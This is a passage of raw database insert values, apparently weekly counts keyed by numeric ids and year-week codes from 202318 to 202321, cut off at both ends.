,(4323,1,'202318',1),(4377,1,'202318',1),(4400,1,'202318',1),(4408,1,'202318',1),(4424,1,'202318',1),(4514,1,'202318',1),(4566,1,'202318',1),(4648,1,'202318',1),(4651,1,'202318',1),(4862,1,'202318',1),(5137,1,'202318',1),(110,1,'202318',2),(1713,1,'202318',2),(1720,1,'202318',2),(1732,1,'202318',2),(1782,1,'202318',2),(2063,1,'202318',2),(2148,1,'202318',2),(2150,1,'202318',2),(2152,1,'202318',2),(2154,1,'202318',2),(2252,1,'202318',2),(2296,1,'202318',2),(3005,1,'202318',2),(3027,1,'202318',2),(3038,1,'202318',2),(3041,1,'202318',2),(3096,1,'202318',2),(3117,1,'202318',2),(3124,1,'202318',2),(3229,1,'202318',2),(3249,1,'202318',2),(3253,1,'202318',2),(3261,1,'202318',2),(3265,1,'202318',2),(3269,1,'202318',2),(3271,1,'202318',2),(3285,1,'202318',2),(3430,1,'202318',2),(3534,1,'202318',2),(3727,1,'202318',2),(3774,1,'202318',2),(4275,1,'202318',2),(4326,1,'202318',2),(4329,1,'202318',2),(4357,1,'202318',2),(4363,1,'202318',2),(4382,1,'202318',2),(4396,1,'202318',2),(4404,1,'202318',2),(4428,1,'202318',2),(4432,1,'202318',2),(4440,1,'202318',2),(4454,1,'202318',2),(4517,1,'202318',2),(4612,1,'202318',2),(4797,1,'202318',2),(4870,1,'202318',2),(4883,1,'202318',2),(5020,1,'202318',2),(5042,1,'202318',2),(5050,1,'202318',2),(5101,1,'202318',2),(5146,1,'202318',2),(106,1,'202318',3),(1695,1,'202318',3),(1701,1,'202318',3),(1707,1,'202318',3),(1709,1,'202318',3),(1739,1,'202318',3),(1741,1,'202318',3),(1751,1,'202318',3),(1766,1,'202318',3),(2165,1,'202318',3),(2293,1,'202318',3),(2558,1,'202318',3),(2704,1,'202318',3),(2911,1,'202318',3),(3072,1,'202318',3),(3087,1,'202318',3),(3097,1,'202318',3),(3107,1,'202318',3),(3127,1,'202318',3),(3243,1,'202318',3),(3245,1,'202318',3),(3247,1,'202318',3),(3251,1,'202318',3),(3280,1,'202318',3),(3282,1,'202318',3),(3297,1,'202318',3),(3531,1,'202318',3),(3541,1,'202318',3),(3710,1,'202318',3),(3714,1,'202318',3),(3731,1,'202318',3),(3738,1,'202318',3),(3777,1,'202318',3),(4524,1,'202318',3),(4529,1,'202318',3),(4542,1,'202318',3),(4546,1,'202318',3),(4582,1,'202318',3),(4668,1,'202318',3),(4688,1,'202318',3),(4712,1,'202318',3),(4741,1,'202318',3),(4762,1,'202318',3),(4858,1,'202318',3),(4866,1,'202318',3),(4874,1,'202318',3),(4888,1,'202318',3),(4897,1,'202318',3),(5046,1,'202318',3),(5080,1,'202318',3),(5122,1,'202318',3),(5140,1,'202318',3),(5248,1,'202318',3),(5280,1,'202318',3),(5292,1,'202318',3),(5330,1,'202318',3),(102,1,'202318',4),(485,1,'202318',4),(488,1,'202318',4),(1590,1,'202318',4),(1699,1,'202318',4),(1730,1,'202318',4),(1734,1,'202318',4),(1743,1,'202318',4),(1747,1,'202318',4),(1768,1,'202318',4),(1772,1,'202318',4),(1776,1,'202318',4),(1780,1,'202318',4),(2178,1,'202318',4),(2248,1,'202318',4),(2617,1,'202318',4),(2751,1,'202318',4),(2775,1,'202318',4),(2801,1,'202318',4),(2813,1,'202318',4),(2965,1,'202318',4),(2993,1,'202318',4),(3006,1,'202318',4),(3045,1,'202318',4),(3063,1,'202318',4),(3079,1,'202318',4),(3104,1,'202318',4),(3109,1,'202318',4),(3226,1,'202318',4),(3240,1,'202318',4),(3273,1,'202318',4),(3275,1,'202318',4),(3278,1,'202318',4),(3290,1,'202318',4),(3307,1,'202318',4),(3438,1,'202318',4),(3479,1,'202318',4),(3482,1,'202318',4),(3746,1,'202318',4),(3749,1,'202318',4),(3752,1,'202318',4),(4332,1,'202318',4),(4341,1,'202318',4),(4373,1,'202318',4),(4444,1,'202318',4),(4556,1,'202318',4),(4587,1,'202318',4),(4591,1,'202318',4),(4654,1,'202318',4),(4691,1,'202318',4),(4694,1,'202318',4),(4703,1,'202318',4),(4722,1,'202318',4),(4756,1,'202318',4),(4771,1,'202318',4),(4802,1,'202318',4),(5024,1,'202318',4),(5058,1,'202318',4),(5125,1,'202318',4),(5157,1,'202318',4),(5259,1,'202318',4),(5298,1,'202318',4),(5301,1,'202318',4),(5307,1,'202318',4),(5320,1,'202318',4),(5326,1,'202318',4),(473,1,'202318',5),(480,1,'202318',5),(1703,1,'202318',5),(1778,1,'202318',5),(2457,1,'202318',5),(2989,1,'202318',5),(2991,1,'202318',5),(3092,1,'202318',5),(3259,1,'202318',5),(3267,1,'202318',5),(3313,1,'202318',5),(3486,1,'202318',5),(3498,1,'202318',5),(3721,1,'202318',5),(3735,1,'202318',5),(4238,1,'202318',5),(4335,1,'202318',5),(4416,1,'202318',5),(4551,1,'202318',5),(4645,1,'202318',5),(4660,1,'202318',5),(4744,1,'202318',5),(4747,1,'202318',5),(4765,1,'202318',5),(4878,1,'202318',5),(4976,1,'202318',5),(4977,1,'202318',5),(4983,1,'202318',5),(4988,1,'202318',5),(4996,1,'202318',5),(5054,1,'202318',5),(5131,1,'202318',5),(5134,1,'202318',5),(5268,1,'202318',5),(5271,1,'202318',5),(5276,1,'202318',5),(5310,1,'202318',5),(5314,1,'202318',5),(5323,1,'202318',5),(469,1,'202318',6),(482,1,'202318',6),(484,1,'202318',6),(486,1,'202318',6),(1614,1,'202318',6),(1718,1,'202318',6),(1726,1,'202318',6),(2156,1,'202318',6),(2658,1,'202318',6),(2769,1,'202318',6),(3004,1,'202318',6),(3060,1,'202318',6),(3102,1,'202318',6),(3263,1,'202318',6),(3316,1,'202318',6),(3742,1,'202318',6),(3771,1,'202318',6),(4657,1,'202318',6),(4706,1,'202318',6),(4753,1,'202318',6),(4776,1,'202318',6),(4893,1,'202318',6),(5037,1,'202318',6),(5062,1,'202318',6),(5067,1,'202318',6),(5128,1,'202318',6),(476,1,'202318',7),(478,1,'202318',7),(479,1,'202318',7),(481,1,'202318',7),(483,1,'202318',7),(1604,1,'202318',7),(1711,1,'202318',7),(2159,1,'202318',7),(2956,1,'202318',7),(3724,1,'202318',7),(4697,1,'202318',7),(4750,1,'202318',7),(4759,1,'202318',7),(4768,1,'202318',7),(5028,1,'202318',7),(5033,1,'202318',7),(5153,1,'202318',7),(5264,1,'202318',7),(74,1,'202318',8),(467,1,'202318',8),(477,1,'202318',8),(1544,1,'202318',8),(1584,1,'202318',8),(1606,1,'202318',8),(1724,1,'202318',8),(1749,1,'202318',8),(2804,1,'202318',8),(4338,1,'202318',8),(4709,1,'202318',8),(5071,1,'202318',8),(5253,1,'202318',8),(5256,1,'202318',8),(5295,1,'202318',8),(471,1,'202318',9),(487,1,'202318',9),(570,1,'202318',9),(1745,1,'202318',9),(3066,1,'202318',9),(3069,1,'202318',9),(4301,1,'202318',9),(4420,1,'202318',9),(4448,1,'202318',9),(4520,1,'202318',9),(4677,1,'202318',9),(4980,1,'202318',9),(5304,1,'202318',9),(5317,1,'202318',9),(474,1,'202318',10),(1598,1,'202318',10),(1608,1,'202318',10),(2609,1,'202318',10),(4608,1,'202318',10),(4674,1,'202318',10),(5076,1,'202318',10),(5334,1,'202318',10),(84,1,'202318',11),(468,1,'202318',11),(472,1,'202318',11),(1592,1,'202318',11),(4391,1,'202318',11),(4436,1,'202318',11),(4457,1,'202318',11),(87,1,'202318',12),(1602,1,'202318',12),(1610,1,'202318',12),(1722,1,'202318',12),(1728,1,'202318',12),(2503,1,'202318',12),(2809,1,'202318',12),(3090,1,'202318',12),(3764,1,'202318',12),(3781,1,'202318',12),(4663,1,'202318',12),(4700,1,'202318',12),(3083,1,'202318',14),(108,1,'202318',15),(76,1,'202318',16),(91,1,'202318',16),(335,1,'202318',16),(470,1,'202318',16),(1612,1,'202318',16),(3030,1,'202318',16),(4412,1,'202318',16),(1588,1,'202318',18),(1594,1,'202318',18),(1600,1,'202318',18),(2309,1,'202318',18),(4930,1,'202318',19),(5163,1,'202318',20),(89,1,'202318',24),(2904,1,'202318',24),(1586,1,'202318',25),(1596,1,'202318',25),(1582,1,'202318',26),(68,1,'202318',29),(72,1,'202318',37),(80,1,'202318',148),(9,1,'202318',758),(110,1,'202319',1),(477,1,'202319',1),(483,1,'202319',1),(1699,1,'202319',1),(1705,1,'202319',1),(1709,1,'202319',1),(1715,1,'202319',1),(1732,1,'202319',1),(1743,1,'202319',1),(1772,1,'202319',1),(2248,1,'202319',1),(2751,1,'202319',1),(2956,1,'202319',1),(2965,1,'202319',1),(2991,1,'202319',1),(2993,1,'202319',1),(3041,1,'202319',1),(3092,1,'202319',1),(3096,1,'202319',1),(3109,1,'202319',1),(3117,1,'202319',1),(3240,1,'202319',1),(3243,1,'202319',1),(3249,1,'202319',1),(3251,1,'202319',1),(3253,1,'202319',1),(3263,1,'202319',1),(3267,1,'202319',1),(3275,1,'202319',1),(3278,1,'202319',1),(3280,1,'202319',1),(3297,1,'202319',1),(3307,1,'202319',1),(3316,1,'202319',1),(3438,1,'202319',1),(3534,1,'202319',1),(3714,1,'202319',1),(3746,1,'202319',1),(3752,1,'202319',1),(4275,1,'202319',1),(4373,1,'202319',1),(4377,1,'202319',1),(4382,1,'202319',1),(4396,1,'202319',1),(4400,1,'202319',1),(4404,1,'202319',1),(4428,1,'202319',1),(4432,1,'202319',1),(4514,1,'202319',1),(4517,1,'202319',1),(4591,1,'202319',1),(4706,1,'202319',1),(4712,1,'202319',1),(4858,1,'202319',1),(4862,1,'202319',1),(4888,1,'202319',1),(4988,1,'202319',1),(5020,1,'202319',1),(5125,1,'202319',1),(5259,1,'202319',1),(5298,1,'202319',1),(102,1,'202319',2),(478,1,'202319',2),(479,1,'202319',2),(480,1,'202319',2),(482,1,'202319',2),(484,1,'202319',2),(485,1,'202319',2),(488,1,'202319',2),(1590,1,'202319',2),(1703,1,'202319',2),(1707,1,'202319',2),(1726,1,'202319',2),(1737,1,'202319',2),(1739,1,'202319',2),(1768,1,'202319',2),(1776,1,'202319',2),(1778,1,'202319',2),(1780,1,'202319',2),(1782,1,'202319',2),(2063,1,'202319',2),(2154,1,'202319',2),(2156,1,'202319',2),(2161,1,'202319',2),(2165,1,'202319',2),(2178,1,'202319',2),(2252,1,'202319',2),(2293,1,'202319',2),(2558,1,'202319',2),(2704,1,'202319',2),(2813,1,'202319',2),(3045,1,'202319',2),(3072,1,'202319',2),(3102,1,'202319',2),(3229,1,'202319',2),(3247,1,'202319',2),(3257,1,'202319',2),(3261,1,'202319',2),(3479,1,'202319',2),(3486,1,'202319',2),(3710,1,'202319',2),(3727,1,'202319',2),(3742,1,'202319',2),(3749,1,'202319',2),(3774,1,'202319',2),(4326,1,'202319',2),(4329,1,'202319',2),(4335,1,'202319',2),(4341,1,'202319',2),(4357,1,'202319',2),(4387,1,'202319',2),(4424,1,'202319',2),(4648,1,'202319',2),(4668,1,'202319',2),(4681,1,'202319',2),(4694,1,'202319',2),(4697,1,'202319',2),(4703,1,'202319',2),(4722,1,'202319',2),(4797,1,'202319',2),(4878,1,'202319',2),(4883,1,'202319',2),(4976,1,'202319',2),(4983,1,'202319',2),(5028,1,'202319',2),(5042,1,'202319',2),(5046,1,'202319',2),(5050,1,'202319',2),(5080,1,'202319',2),(5131,1,'202319',2),(5137,1,'202319',2),(5146,1,'202319',2),(5157,1,'202319',2),(5271,1,'202319',2),(5310,1,'202319',2),(5314,1,'202319',2),(5330,1,'202319',2),(467,1,'202319',3),(468,1,'202319',3),(472,1,'202319',3),(476,1,'202319',3),(486,1,'202319',3),(2296,1,'202319',3),(2658,1,'202319',3),(2748,1,'202319',3),(2801,1,'202319',3),(3005,1,'202319',3),(3090,1,'202319',3),(3127,1,'202319',3),(3226,1,'202319',3),(3269,1,'202319',3),(3271,1,'202319',3),(3273,1,'202319',3),(3282,1,'202319',3),(3287,1,'202319',3),(3430,1,'202319',3),(3482,1,'202319',3),(3489,1,'202319',3),(3531,1,'202319',3),(3731,1,'202319',3),(3735,1,'202319',3),(3738,1,'202319',3),(3777,1,'202319',3),(4332,1,'202319',3),(4436,1,'202319',3),(4542,1,'202319',3),(4587,1,'202319',3),(4654,1,'202319',3),(4741,1,'202319',3),(4744,1,'202319',3),(4750,1,'202319',3),(4977,1,'202319',3),(5024,1,'202319',3),(5037,1,'202319',3),(5054,1,'202319',3),(5058,1,'202319',3),(5067,1,'202319',3),(5248,1,'202319',3),(5301,1,'202319',3),(74,1,'202319',4),(471,1,'202319',4),(473,1,'202319',4),(474,1,'202319',4),(487,1,'202319',4),(1584,1,'202319',4),(1747,1,'202319',4),(1749,1,'202319',4),(1766,1,'202319',4),(1770,1,'202319',4),(2148,1,'202319',4),(2617,1,'202319',4),(2911,1,'202319',4),(2964,1,'202319',4),(3004,1,'202319',4),(3006,1,'202319',4),(3023,1,'202319',4),(3027,1,'202319',4),(3034,1,'202319',4),(3069,1,'202319',4),(3079,1,'202319',4),(3124,1,'202319',4),(3259,1,'202319',4),(3724,1,'202319',4),(4238,1,'202319',4),(4363,1,'202319',4),(4529,1,'202319',4),(4556,1,'202319',4),(4657,1,'202319',4),(4660,1,'202319',4),(4674,1,'202319',4),(4700,1,'202319',4),(4756,1,'202319',4),(4792,1,'202319',4),(4866,1,'202319',4),(4874,1,'202319',4),(4980,1,'202319',4),(5062,1,'202319',4),(5071,1,'202319',4),(5101,1,'202319',4),(5122,1,'202319',4),(5134,1,'202319',4),(5153,1,'202319',4),(5268,1,'202319',4),(5280,1,'202319',4),(5292,1,'202319',4),(5326,1,'202319',4),(84,1,'202319',5),(1722,1,'202319',5),(1724,1,'202319',5),(1774,1,'202319',5),(2297,1,'202319',5),(3060,1,'202319',5),(3066,1,'202319',5),(3107,1,'202319',5),(3285,1,'202319',5),(3290,1,'202319',5),(3313,1,'202319',5),(4301,1,'202319',5),(4338,1,'202319',5),(4444,1,'202319',5),(4520,1,'202319',5),(4582,1,'202319',5),(4663,1,'202319',5),(4685,1,'202319',5),(4747,1,'202319',5),(4753,1,'202319',5),(4768,1,'202319',5),(4771,1,'202319',5),(4996,1,'202319',5),(5140,1,'202319',5),(5289,1,'202319',5),(5304,1,'202319',5),(1711,1,'202319',6),(2989,1,'202319',6),(3498,1,'202319',6),(4391,1,'202319',6),(4420,1,'202319',6),(4651,1,'202319',6),(4709,1,'202319',6),(4759,1,'202319',6),(5264,1,'202319',6),(5276,1,'202319',6),(5295,1,'202319',6),(87,1,'202319',7),(570,1,'202319',7),(1604,1,'202319',7),(1745,1,'202319',7),(2457,1,'202319',7),(2769,1,'202319',7),(2775,1,'202319',7),(4323,1,'202319',7),(4612,1,'202319',7),(4645,1,'202319',7),(4762,1,'202319',7),(4765,1,'202319',7),(5076,1,'202319',7),(5128,1,'202319',7),(5256,1,'202319',7),(5323,1,'202319',7),(76,1,'202319',8),(2609,1,'202319',8),(4416,1,'202319',8),(4608,1,'202319',8),(4677,1,'202319',8),(4776,1,'202319',8),(5317,1,'202319',8),(469,1,'202319',9),(1592,1,'202319',9),(4551,1,'202319',9),(5253,1,'202319',9),(5320,1,'202319',9),(108,1,'202319',10),(470,1,'202319',10),(1718,1,'202319',10),(3030,1,'202319',10),(4448,1,'202319',10),(4930,1,'202319',10),(5033,1,'202319',10),(5307,1,'202319',10),(1606,1,'202319',11),(1608,1,'202319',11),(2159,1,'202319',11),(2503,1,'202319',11),(2804,1,'202319',11),(3083,1,'202319',11),(3781,1,'202319',11),(4457,1,'202319',11),(1544,1,'202319',12),(1612,1,'202319',12),(1728,1,'202319',12),(5334,1,'202319',12),(335,1,'202319',13),(1600,1,'202319',13),(3764,1,'202319',13),(1598,1,'202319',14),(1602,1,'202319',14),(1610,1,'202319',14),(2809,1,'202319',14),(68,1,'202319',15),(1614,1,'202319',15),(91,1,'202319',16),(2309,1,'202319',16),(4412,1,'202319',16),(1586,1,'202319',18),(1594,1,'202319',18),(1582,1,'202319',19),(1588,1,'202319',20),(5163,1,'202319',20),(1596,1,'202319',21),(89,1,'202319',22),(72,1,'202319',28),(2904,1,'202319',31),(80,1,'202319',131),(9,1,'202319',780),(106,1,'202320',4),(1741,1,'202320',4),(1772,1,'202320',4),(4802,1,'202320',4),(1699,1,'202320',5),(1743,1,'202320',5),(2609,1,'202320',5),(3079,1,'202320',5),(3104,1,'202320',5),(3247,1,'202320',5),(3285,1,'202320',5),(3541,1,'202320',5),(4329,1,'202320',5),(4591,1,'202320',5),(4797,1,'202320',5),(5028,1,'202320',5),(110,1,'202320',6),(481,1,'202320',6),(1697,1,'202320',6),(1701,1,'202320',6),(1768,1,'202320',6),(2156,1,'202320',6),(2161,1,'202320',6),(2297,1,'202320',6),(2993,1,'202320',6),(3097,1,'202320',6),(3263,1,'202320',6),(3269,1,'202320',6),(3280,1,'202320',6),(3282,1,'202320',6),(4363,1,'202320',6),(4424,1,'202320',6),(4440,1,'202320',6),(4444,1,'202320',6),(4587,1,'202320',6),(4612,1,'202320',6),(4651,1,'202320',6),(4878,1,'202320',6),(483,1,'202320',7),(1584,1,'202320',7),(1695,1,'202320',7),(1705,1,'202320',7),(1707,1,'202320',7),(1720,1,'202320',7),(1726,1,'202320',7),(1732,1,'202320',7),(1739,1,'202320',7),(1751,1,'202320',7),(1776,1,'202320',7),(2558,1,'202320',7),(2704,1,'202320',7),(3109,1,'202320',7),(3229,1,'202320',7),(3245,1,'202320',7),(3251,1,'202320',7),(3259,1,'202320',7),(3261,1,'202320',7),(3267,1,'202320',7),(3287,1,'202320',7),(3297,1,'202320',7),(3735,1,'202320',7),(3742,1,'202320',7),(4368,1,'202320',7),(4404,1,'202320',7),(4408,1,'202320',7),(4546,1,'202320',7),(4771,1,'202320',7),(4870,1,'202320',7),(5046,1,'202320',7),(5157,1,'202320',7),(1713,1,'202320',8),(1715,1,'202320',8),(1734,1,'202320',8),(1747,1,'202320',8),(1770,1,'202320',8),(1780,1,'202320',8),(2159,1,'202320',8),(2178,1,'202320',8),(2248,1,'202320',8),(2252,1,'202320',8),(2293,1,'202320',8),(2965,1,'202320',8),(3027,1,'202320',8),(3034,1,'202320',8),(3038,1,'202320',8),(3117,1,'202320',8),(3307,1,'202320',8),(3313,1,'202320',8),(3430,1,'202320',8),(3714,1,'202320',8),(3752,1,'202320',8),(3774,1,'202320',8),(4357,1,'202320',8),(4377,1,'202320',8),(4382,1,'202320',8),(4703,1,'202320',8),(4862,1,'202320',8),(4976,1,'202320',8),(5037,1,'202320',8),(5067,1,'202320',8),(5131,1,'202320',8),(5137,1,'202320',8),(5140,1,'202320',8),(5153,1,'202320',8),(5248,1,'202320',8),(5301,1,'202320',8),(102,1,'202320',9),(467,1,'202320',9),(478,1,'202320',9),(485,1,'202320',9),(488,1,'202320',9),(1590,1,'202320',9),(1709,1,'202320',9),(1724,1,'202320',9),(1730,1,'202320',9),(1782,1,'202320',9),(2063,1,'202320',9),(2152,1,'202320',9),(2296,1,'202320',9),(2748,1,'202320',9),(3005,1,'202320',9),(3006,1,'202320',9),(3124,1,'202320',9),(3257,1,'202320',9),(3265,1,'202320',9),(3271,1,'202320',9),(3273,1,'202320',9),(3316,1,'202320',9),(3438,1,'202320',9),(3482,1,'202320',9),(3531,1,'202320',9),(3534,1,'202320',9),(3724,1,'202320',9),(3727,1,'202320',9),(3731,1,'202320',9),(3738,1,'202320',9),(3749,1,'202320',9),(4373,1,'202320',9),(4387,1,'202320',9),(4514,1,'202320',9),(4556,1,'202320',9),(4566,1,'202320',9),(4648,1,'202320',9),(4668,1,'202320',9),(4685,1,'202320',9),(4697,1,'202320',9),(4712,1,'202320',9),(4722,1,'202320',9),(4750,1,'202320',9),(4759,1,'202320',9),(4765,1,'202320',9),(4792,1,'202320',9),(4858,1,'202320',9),(4888,1,'202320',9),(4893,1,'202320',9),(5020,1,'202320',9),(5024,1,'202320',9),(5058,1,'202320',9),(5080,1,'202320',9),(5101,1,'202320',9),(5271,1,'202320',9),(5326,1,'202320',9),(476,1,'202320',10),(479,1,'202320',10),(482,1,'202320',10),(570,1,'202320',10),(1749,1,'202320',10),(2148,1,'202320',10),(2150,1,'202320',10),(2775,1,'202320',10),(2964,1,'202320',10),(2989,1,'202320',10),(3004,1,'202320',10),(3023,1,'202320',10),(3041,1,'202320',10),(3087,1,'202320',10),(3096,1,'202320',10),(3226,1,'202320',10),(3243,1,'202320',10),(3249,1,'202320',10),(3275,1,'202320',10),(3498,1,'202320',10),(4275,1,'202320',10),(4301,1,'202320',10),(4323,1,'202320',10),(4335,1,'202320',10),(4428,1,'202320',10),(4432,1,'202320',10),(4681,1,'202320',10),(4688,1,'202320',10),(4691,1,'202320',10),(4694,1,'202320',10),(4753,1,'202320',10),(4768,1,'202320',10),(4874,1,'202320',10),(4897,1,'202320',10),(4977,1,'202320',10),(4980,1,'202320',10),(4983,1,'202320',10),(5042,1,'202320',10),(5050,1,'202320',10),(5062,1,'202320',10),(5125,1,'202320',10),(5146,1,'202320',10),(470,1,'202320',11),(480,1,'202320',11),(1614,1,'202320',11),(1722,1,'202320',11),(1737,1,'202320',11),(1778,1,'202320',11),(2154,1,'202320',11),(2991,1,'202320',11),(3063,1,'202320',11),(3072,1,'202320',11),(3253,1,'202320',11),(3278,1,'202320',11),(3479,1,'202320',11),(3486,1,'202320',11),(3721,1,'202320',11),(3771,1,'202320',11),(4332,1,'202320',11),(4396,1,'202320',11),(4400,1,'202320',11),(4436,1,'202320',11),(4448,1,'202320',11),(4517,1,'202320',11),(4524,1,'202320',11),(4529,1,'202320',11),(4582,1,'202320',11),(4706,1,'202320',11),(4709,1,'202320',11),(4744,1,'202320',11),(4756,1,'202320',11),(4762,1,'202320',11),(4866,1,'202320',11),(4883,1,'202320',11),(4988,1,'202320',11),(5122,1,'202320',11),(5134,1,'202320',11),(5253,1,'202320',11),(5256,1,'202320',11),(5268,1,'202320',11),(5292,1,'202320',11),(471,1,'202320',12),(477,1,'202320',12),(487,1,'202320',12),(1610,1,'202320',12),(1711,1,'202320',12),(1774,1,'202320',12),(2658,1,'202320',12),(2751,1,'202320',12),(2801,1,'202320',12),(2911,1,'202320',12),(3045,1,'202320',12),(3092,1,'202320',12),(3102,1,'202320',12),(3489,1,'202320',12),(3710,1,'202320',12),(4341,1,'202320',12),(4660,1,'202320',12),(4663,1,'202320',12),(4741,1,'202320',12),(4747,1,'202320',12),(4776,1,'202320',12),(4996,1,'202320',12),(5054,1,'202320',12),(5071,1,'202320',12),(5289,1,'202320',12),(472,1,'202320',13),(474,1,'202320',13),(2617,1,'202320',13),(3127,1,'202320',13),(3240,1,'202320',13),(3290,1,'202320',13),(3746,1,'202320',13),(3777,1,'202320',13),(4326,1,'202320',13),(4391,1,'202320',13),(4608,1,'202320',13),(4654,1,'202320',13),(4657,1,'202320',13),(4700,1,'202320',13),(5076,1,'202320',13),(5128,1,'202320',13),(5259,1,'202320',13),(5323,1,'202320',13),(484,1,'202320',14),(1703,1,'202320',14),(1766,1,'202320',14),(2165,1,'202320',14),(2813,1,'202320',14),(4542,1,'202320',14),(5307,1,'202320',14),(5310,1,'202320',14),(5330,1,'202320',14),(74,1,'202320',15),(468,1,'202320',15),(469,1,'202320',15),(486,1,'202320',15),(2956,1,'202320',15),(3060,1,'202320',15),(4420,1,'202320',15),(4674,1,'202320',15),(5314,1,'202320',15),(1602,1,'202320',16),(1606,1,'202320',16),(1718,1,'202320',16),(2769,1,'202320',16),(3083,1,'202320',16),(3107,1,'202320',16),(4238,1,'202320',16),(4677,1,'202320',16),(5298,1,'202320',16),(5317,1,'202320',16),(473,1,'202320',17),(4338,1,'202320',17),(4454,1,'202320',17),(5320,1,'202320',17),(1598,1,'202320',18),(1600,1,'202320',18),(1745,1,'202320',18),(2804,1,'202320',18),(4457,1,'202320',18),(4645,1,'202320',18),(1612,1,'202320',19),(3030,1,'202320',19),(4551,1,'202320',19),(5295,1,'202320',19),(108,1,'202320',20),(1544,1,'202320',20),(1592,1,'202320',20),(2309,1,'202320',20),(3090,1,'202320',20),(5280,1,'202320',20),(84,1,'202320',21),(87,1,'202320',21),(335,1,'202320',21),(3069,1,'202320',21),(3764,1,'202320',21),(4412,1,'202320',21),(4416,1,'202320',21),(4520,1,'202320',21),(5033,1,'202320',21),(5304,1,'202320',21),(2503,1,'202320',22),(3066,1,'202320',22),(4930,1,'202320',22),(5276,1,'202320',22),(5334,1,'202320',22),(91,1,'202320',23),(1588,1,'202320',23),(1594,1,'202320',23),(1604,1,'202320',23),(1608,1,'202320',23),(5264,1,'202320',24),(3781,1,'202320',25),(1728,1,'202320',26),(5163,1,'202320',26),(2457,1,'202320',27),(2809,1,'202320',30),(1596,1,'202320',31),(76,1,'202320',32),(89,1,'202320',37),(1586,1,'202320',37),(68,1,'202320',39),(1582,1,'202320',42),(72,1,'202320',61),(2904,1,'202320',91),(80,1,'202320',183),(9,1,'202320',774),(1720,1,'202321',1),(2293,1,'202321',1),(3090,1,'202321',1),(3109,1,'202321',1),(3482,1,'202321',1),(3771,1,'202321',1),(3774,1,'202321',1),(4428,1,'202321',1),(102,1,'202321',2),(1695,1,'202321',2),(1713,1,'202321',2),(1715,1,'202321',2),(1732,1,'202321',2),(2063,1,'202321',2),(2161,1,'202321',2),(2248,1,'202321',2),(2252,1,'202321',2),(3006,1,'202321',2),(3027,1,'202321',2),(3127,1,'202321',2),(3243,1,'202321',2),(3249,1,'202321',2),(3251,1,'202321',2),(3257,1,'202321',2),(3263,1,'202321',2),(3269,1,'202321',2),(3271,1,'202321',2),(3316,1,'202321',2),(3438,1,'202321',2),(3479,1,'202321',2),(3721,1,'202321',2),(4275,1,'202321',2),(4363,1,'202321',2),(4382,1,'202321',2),(4432,1,'202321',2),(4556,1,'202321',2),(4582,1,'202321',2),(4654,1,'202321',2),(4741,1,'202321',2),(4747,1,'202321',2),(4765,1,'202321',2),(4771,1,'202321',2),(4792,1,'202321',2),(4883,1,'202321',2),(4897,1,'202321',2),(4996,1,'202321',2),(5280,1,'202321',2),(5330,1,'202321',2),(106,1,'202321',3),(471,1,'202321',3),(476,1,'202321',3),(478,1,'202321',3),(482,1,'202321',3),(483,1,'202321',3),(488,1,'202321',3),(1590,1,'202321',3),(1703,1,'202321',3),(1705,1,'202321',3),(1707,1,'202321',3),(1726,1,'202321',3),(1730,1,'202321',3),(1734,1,'202321',3),(1737,1,'202321',3),(1739,1,'202321',3),(1747,1,'202321',3),(1751,1,'202321',3),(1768,1,'202321',3),(1776,1,'202321',3),(2148,1,'202321',3),(2150,1,'202321',3),(2152,1,'202321',3),(2775,1,'202321',3),(2801,1,'202321',3),(2813,1,'202321',3),(2956,1,'202321',3),(2964,1,'202321',3),(2993,1,'202321',3),(3004,1,'202321',3),(3023,1,'202321',3),(3097,1,'202321',3),(3104,1,'202321',3),(3253,1,'202321',3),(3267,1,'202321',3),(3273,1,'202321',3),(3280,1,'202321',3),(3282,1,'202321',3),(3287,1,'202321',3),(3313,1,'202321',3),(3430,1,'202321',3),(3486,1,'202321',3),(3531,1,'202321',3),(3714,1,'202321',3),(3735,1,'202321',3),(3742,1,'202321',3),(3746,1,'202321',3),(3749,1,'202321',3),(4326,1,'202321',3),(4373,1,'202321',3),(4387,1,'202321',3),(4396,1,'202321',3),(4400,1,'202321',3),(4454,1,'202321',3),(4514,1,'202321',3),(4657,1,'202321',3),(4660,1,'202321',3),(4722,1,'202321',3),(4750,1,'202321',3),(4797,1,'202321',3),(4862,1,'202321',3),(4874,1,'202321',3),(4888,1,'202321',3),(5146,1,'202321',3),(5259,1,'202321',3),(5268,1,'202321',3),(5271,1,'202321',3),(5289,1,'202321',3),(110,1,'202321',4),(469,1,'202321',4),(477,1,'202321',4),(479,1,'202321',4),(485,1,'202321',4),(1709,1,'202321',4),(1741,1,'202321',4),(1749,1,'202321',4),(1778,1,'202321',4),(1780,1,'202321',4),(1782,1,'202321',4),(2156,1,'202321',4),(2297,1,'202321',4),(2617,1,'202321',4),(2704,1,'202321',4),(2748,1,'202321',4),(2751,1,'202321',4),(2911,1,'202321',4),(2991,1,'202321',4),(3041,1,'202321',4),(3063,1,'202321',4),(3079,1,'202321',4),(3096,1,'202321',4),(3117,1,'202321',4),(3226,1,'202321',4),(3259,1,'202321',4),(3265,1,'202321',4),(3278,1,'202321',4),(3498,1,'202321',4),(3710,1,'202321',4),(3727,1,'202321',4),(3731,1,'202321',4),(4323,1,'202321',4),(4332,1,'202321',4),(4377,1,'202321',4),(4408,1,'202321',4),(4424,1,'202321',4),(4436,1,'202321',4),(4517,1,'202321',4),(4542,1,'202321',4),(4546,1,'202321',4),(4591,1,'202321',4),(4668,1,'202321',4),(4744,1,'202321',4),(4756,1,'202321',4),(4762,1,'202321',4),(4768,1,'202321',4),(4802,1,'202321',4),(4858,1,'202321',4),(4866,1,'202321',4),(4893,1,'202321',4),(4977,1,'202321',4),(4983,1,'202321',4),(4988,1,'202321',4),(5037,1,'202321',4),(5050,1,'202321',4),(5125,1,'202321',4),(5137,1,'202321',4),(5153,1,'202321',4),(480,1,'202321',5),(484,1,'202321',5),(486,1,'202321',5),(1697,1,'202321',5),(1701,1,'202321',5),(1743,1,'202321',5),(2178,1,'202321',5),(2296,1,'202321',5),(2558,1,'202321',5),(2965,1,'202321',5),(2989,1,'202321',5),(3045,1,'202321',5),(3087,1,'202321',5),(3092,1,'202321',5),(3124,1,'202321',5),(3247,1,'202321',5),(3285,1,'202321',5),(3489,1,'202321',5),(3534,1,'202321',5),(3541,1,'202321',5),(3724,1,'202321',5),(3777,1,'202321',5),(4335,1,'202321',5),(4341,1,'202321',5),(4440,1,'202321',5),(4529,1,'202321',5),(4587,1,'202321',5),(4648,1,'202321',5),(4651,1,'202321',5),(4685,1,'202321',5),(4688,1,'202321',5),(4691,1,'202321',5),(4703,